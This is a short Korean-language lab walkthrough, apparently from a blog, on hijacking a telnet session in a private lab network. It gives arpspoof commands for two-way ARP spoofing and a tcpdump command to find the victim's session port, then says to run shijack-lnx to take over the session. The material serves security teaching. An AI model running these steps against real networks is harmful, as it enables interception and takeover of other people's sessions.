[shijack] 세션 하이제킹 실습

실습 환경:

Victim : 192.168.100.20

Server : 192.168.100.131

Hacker: 192.168.100.128

 

Server에서 telnet 서버가 돌고 있고 Victim이 클라이언트로 접속하는 상황이다.

ARP 스푸핑을 하기 위해 세팅

$ sudo arpspoof -i eth0 -t [Victim IP Address] [Router IP Address]

 

$ sudo arpspoof -i eth0 -t [Router IP Address] [Victim IP Address]

이렇게 하면 세션하이제킹을 위한 준비가 완료된다.

 

$ sudo tcpdump -i [네트워크 인터페이스명] src [Victim IP Address]

 

여기서 클라이언트의 telnet 세션의 포트를 확인한다.

 

 

그리고 shijack-lnx을 실행하면 세션을 하이제킹하여 칼리에서 텔넷의 세션을 훔칠 수 있다.